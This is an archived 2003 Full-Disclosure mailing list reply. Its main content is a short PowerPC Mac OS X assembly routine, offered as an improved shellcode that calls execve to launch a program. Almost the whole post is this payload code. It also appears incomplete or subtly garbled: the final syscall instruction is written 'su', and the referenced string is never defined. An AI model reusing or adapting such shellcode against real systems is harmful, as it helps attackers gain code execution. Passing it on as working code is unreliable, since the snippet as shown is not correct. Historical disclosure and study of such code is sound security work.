Re: [Full-Disclosure] PPC OSX Shellcode ASM

From: Andrew Pinski (pinskia_at_physics.uc.edu)
Date: 09/01/03

Next message: Bennett Todd: "Re: [Full-Disclosure] Virus, whether the scanners say so or not?"

Previous message: KF: "Re: [Full-Disclosure] PPC OSX Shellcode ASM"
In reply to: B-r00t: "[Full-Disclosure] PPC OSX Shellcode ASM"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: B-r00t <br00t@blueyonder.co.uk>
Date: Mon, 1 Sep 2003 08:34:22 -0700

The original code for execeve can be improved on, yes it is the same
size (but faster for 970):
_main:
        bcl 20,31,"L00000000001$pb" ;fast way of not flushing the lr link
stack
"L00000000001$pb":
        mflr r3 ; r3 = main+8
        xor r5,r5,r5 ; r5 = 0
        addi r3, r3, lo16(string) ;r3 = string
        stw r3, -8(r1) ;argv[0] = string
        stw r5, -4(r1) ; argv[1] = NULL
        subi r4, r1,8 ;r4 = pointer to argv[]
        li r0, 59 ; r0 = 59 execve()
        su ; execve(r3, r4, r5)

Thanks,
Andrew Pinski

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Bennett Todd: "Re: [Full-Disclosure] Virus, whether the scanners say so or not?"

Previous message: KF: "Re: [Full-Disclosure] PPC OSX Shellcode ASM"
In reply to: B-r00t: "[Full-Disclosure] PPC OSX Shellcode ASM"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]